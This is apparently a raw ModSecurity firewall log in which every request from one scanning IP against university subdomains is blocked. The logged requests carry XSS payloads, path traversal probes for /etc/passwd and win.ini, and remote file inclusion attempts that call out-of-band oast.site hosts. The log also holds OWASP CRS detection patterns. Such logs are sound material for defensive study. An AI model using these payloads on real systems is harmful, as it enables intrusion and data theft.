[Tue Aug 29 11:54:52.561533 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16HMCo-f0AAApXgh4AAAAU"]
[Tue Aug 29 11:54:52.574531 2023] [:error] [pid 2711] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16HMCo-f0AAAqXySoAAAAq"]
[Tue Aug 29 11:54:52.575004 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16HMCo-f0AAApbUYAAAAAh"]
[Tue Aug 29 11:54:52.599901 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HMCo-f0AAApXgh8AAAAU"]
[Tue Aug 29 11:54:52.638184 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HMCo-f0AAAqSwlkAAAAN"]
[Tue Aug 29 11:54:52.639519 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16HMCo-f0AAApk-ZUAAAAn"]
[Tue Aug 29 11:54:52.653286 2023] [:error] [pid 2711] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16HMCo-f0AAAqXyS0AAAAq"]
[Tue Aug 29 11:54:52.669632 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HMCo-f0AAApa-IQAAAAg"]
[Tue Aug 29 11:54:52.673356 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HMCo-f0AAAoAk8MAAAAC"]
[Tue Aug 29 11:54:52.693208 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HMCo-f0AAAqRzFUAAAAM"]
[Tue Aug 29 11:54:53.942857 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HcCo-f0AAAqWwakAAAAl"]
[Tue Aug 29 11:54:53.985255 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HcCo-f0AAAqhN-IAAAAE"]
[Tue Aug 29 11:54:54.017686 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HsCo-f0AAAoAk8UAAAAC"]
[Tue Aug 29 11:54:54.036844 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HsCo-f0AAAqUB6IAAAAb"]
[Tue Aug 29 11:54:54.055856 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HsCo-f0AAApa-IYAAAAg"]
[Tue Aug 29 11:54:54.412146 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HsCo-f0AAAqUB6MAAAAb"]
[Tue Aug 29 11:54:54.757591 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HsCo-f0AAAqY58gAAAAr"]
[Tue Aug 29 11:54:55.543202 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16H8Co-f0AAApa-IsAAAAg"]
[Tue Aug 29 11:54:55.547097 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16H8Co-f0AAApbUYYAAAAh"]
[Tue Aug 29 11:54:55.551292 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16H8Co-f0AAAqhN-YAAAAE"]
[Tue Aug 29 11:54:55.572623 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16H8Co-f0AAAqWwa4AAAAl"]
[Tue Aug 29 11:54:55.579268 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16H8Co-f0AAAqhN-cAAAAE"]
[Tue Aug 29 11:54:55.592840 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0jx5t7e4mssn7k.oast.site found within TX:1: cjmnijtjmimvgniikdb0jx5t7e4mssn7k.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16H8Co-f0AAAqUB6gAAAAb"]
[Tue Aug 29 11:54:55.593149 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb01noqnu5kdgros.oast.site found within TX:1: cjmnijtjmimvgniikdb01noqnu5kdgros.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16H8Co-f0AAApHRaUAAAAP"]
[Tue Aug 29 11:54:55.595501 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0ahu6m9nsxtrx1.oast.site found within TX:1: cjmnijtjmimvgniikdb0ahu6m9nsxtrx1.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16H8Co-f0AAApa-I0AAAAg"]
[Tue Aug 29 11:54:55.636826 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0ge4jn9qufd414.oast.site found within TX:1: cjmnijtjmimvgniikdb0ge4jn9qufd414.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16H8Co-f0AAApbUYcAAAAh"]
[Tue Aug 29 11:54:56.539860 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0j1ahsszf5d51n.oast.site found within TX:1: cjmnijtjmimvgniikdb0j1ahsszf5d51n.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16IMCo-f0AAApa-JQAAAAg"]
[Tue Aug 29 11:54:56.568509 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IMCo-f0AAAqhOAEAAAAE"]
[Tue Aug 29 11:54:56.589376 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0jt67myead3f9o.oast.site found within TX:1: cjmnijtjmimvgniikdb0jt67myead3f9o.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16IMCo-f0AAApa-JUAAAAg"]
[Tue Aug 29 11:54:56.672688 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IMCo-f0AAApk-aIAAAAn"]
[Tue Aug 29 11:54:56.678717 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16IMCo-f0AAAoAk88AAAAC"]
[Tue Aug 29 11:54:56.729123 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IMCo-f0AAApHRasAAAAP"]
[Tue Aug 29 11:54:56.732908 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IMCo-f0AAAqWwbgAAAAl"]
[Tue Aug 29 11:54:56.782333 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IMCo-f0AAAoAk9IAAAAC"]
